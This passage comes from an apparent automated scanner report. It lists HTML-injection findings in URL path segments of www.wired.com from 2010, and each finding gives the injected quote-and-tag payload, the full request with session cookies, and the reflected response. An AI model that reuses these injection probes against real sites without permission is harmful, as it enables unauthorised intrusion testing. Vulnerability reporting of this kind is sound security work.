<body class="s_multimedia3e1b5"><a>d5da876dbe0">
...[SNIP]...

1.182. http://www.wired.com/news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88eb2"><a>01f8e05d095 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/archive88eb2"><a>01f8e05d095/2010-01/15/javascript-hack-enables-flash-on-iphone HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 22 Nov 2010 01:21:53 GMT
Date: Mon, 22 Nov 2010 01:11:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_news ss_archive88eb2"><a>01f8e05d095 c_2010-01">
...[SNIP]...

1.183. http://www.wired.com/news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /news/archive/2010-01/15/javascript-hack-enables-flash-on-iphone

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e94db"><a>4cebf2d1561 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /news/archive/2010-01e94db"><a>4cebf2d1561/15/javascript-hack-enables-flash-on-iphone HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29401
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 22 Nov 2010 01:22:18 GMT
Date: Mon, 22 Nov 2010 01:12:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_news ss_archive c_2010-01e94db"><a>4cebf2d1561">
...[SNIP]...

1.184. http://www.wired.com/politics [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c427d"><a>e6d5b4a7516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politicsc427d"><a>e6d5b4a7516 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29299
Vary: Accept-Encoding
Cache-Control: max-age=239
Expires: Mon, 22 Nov 2010 01:15:40 GMT
Date: Mon, 22 Nov 2010 01:11:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politicsc427d"><a>e6d5b4a7516">
...[SNIP]...

1.185. http://www.wired.com/politics/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70abd"><a>9d24c849cc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics70abd"><a>9d24c849cc4/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29300
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Sun, 21 Nov 2010 20:20:15 GMT
Date: Sun, 21 Nov 2010 20:16:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics70abd"><a>9d24c849cc4">
...[SNIP]...

1.186. http://www.wired.com/politics/law [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/law

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 209da"><a>9d347d00209 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics209da"><a>9d347d00209/law HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:13:03 GMT
Date: Sun, 21 Nov 2010 23:09:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics209da"><a>9d347d00209 ss_law">
...[SNIP]...

1.187. http://www.wired.com/politics/law [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/law

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82c1"><a>05b6fbcb3c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics/lawd82c1"><a>05b6fbcb3c6 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29310
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:31 GMT
Date: Sun, 21 Nov 2010 23:09:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics ss_lawd82c1"><a>05b6fbcb3c6">
...[SNIP]...

1.188. http://www.wired.com/politics/onlinerights [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/onlinerights

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 623f2"><a>92180a2ca9b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics623f2"><a>92180a2ca9b/onlinerights HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29328
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:13:05 GMT
Date: Sun, 21 Nov 2010 23:09:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics623f2"><a>92180a2ca9b ss_onlinerights">
...[SNIP]...

1.189. http://www.wired.com/politics/onlinerights [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/onlinerights

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ecce"><a>b1a59a8a533 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics/onlinerights3ecce"><a>b1a59a8a533 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29328
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:32 GMT
Date: Sun, 21 Nov 2010 23:09:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics ss_onlinerights3ecce"><a>b1a59a8a533">
...[SNIP]...

1.190. http://www.wired.com/politics/security [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/security

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5482e"><a>d19474f130 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics5482e"><a>d19474f130/security HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29318
Vary: Accept-Encoding
Cache-Control: max-age=229
Expires: Sun, 21 Nov 2010 23:12:58 GMT
Date: Sun, 21 Nov 2010 23:09:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics5482e"><a>d19474f130 ss_security">
...[SNIP]...

1.191. http://www.wired.com/politics/security [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /politics/security

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f2a3"><a>f519379c247 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /politics/security5f2a3"><a>f519379c247 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29320
Vary: Accept-Encoding
Cache-Control: max-age=555
Expires: Sun, 21 Nov 2010 23:18:52 GMT
Date: Sun, 21 Nov 2010 23:09:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_politics ss_security5f2a3"><a>f519379c247">
...[SNIP]...

1.192. http://www.wired.com/science [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da50c"><a>af7f20fae3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /scienceda50c"><a>af7f20fae3a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29259
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:42 GMT
Date: Mon, 22 Nov 2010 01:11:42 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_scienceda50c"><a>af7f20fae3a">
...[SNIP]...

1.193. http://www.wired.com/science/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb46"><a>7e95b9b5c37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science8fb46"><a>7e95b9b5c37/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29260
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Sun, 21 Nov 2010 20:03:06 GMT
Date: Sun, 21 Nov 2010 19:59:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science8fb46"><a>7e95b9b5c37">
...[SNIP]...

1.194. http://www.wired.com/science/discoveries [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96ddf"><a>cdde2cce323 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science96ddf"><a>cdde2cce323/discoveries HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29286
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:13:10 GMT
Date: Sun, 21 Nov 2010 23:09:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science96ddf"><a>cdde2cce323 ss_discoveries">
...[SNIP]...

1.195. http://www.wired.com/science/discoveries [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38394"><a>ab4904fcd7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries38394"><a>ab4904fcd7d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29286
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:35 GMT
Date: Sun, 21 Nov 2010 23:09:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries38394"><a>ab4904fcd7d">
...[SNIP]...

1.196. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/1999/09/31631

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd1d"><a>538a6317253 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sciencecbd1d"><a>538a6317253/discoveries/news/1999/09/31631 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:55 GMT
Date: Sun, 21 Nov 2010 23:12:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencecbd1d"><a>538a6317253 ss_discoveries c_news">
...[SNIP]...

1.197. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/1999/09/31631

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3da6c"><a>360db666dd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries3da6c"><a>360db666dd0/news/1999/09/31631 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29312
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:13 GMT
Date: Sun, 21 Nov 2010 23:13:13 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries3da6c"><a>360db666dd0 c_news">
...[SNIP]...

1.198. http://www.wired.com/science/discoveries/news/1999/09/31631 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/1999/09/31631

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a30c"><a>b820a999ffb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news3a30c"><a>b820a999ffb/1999/09/31631 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
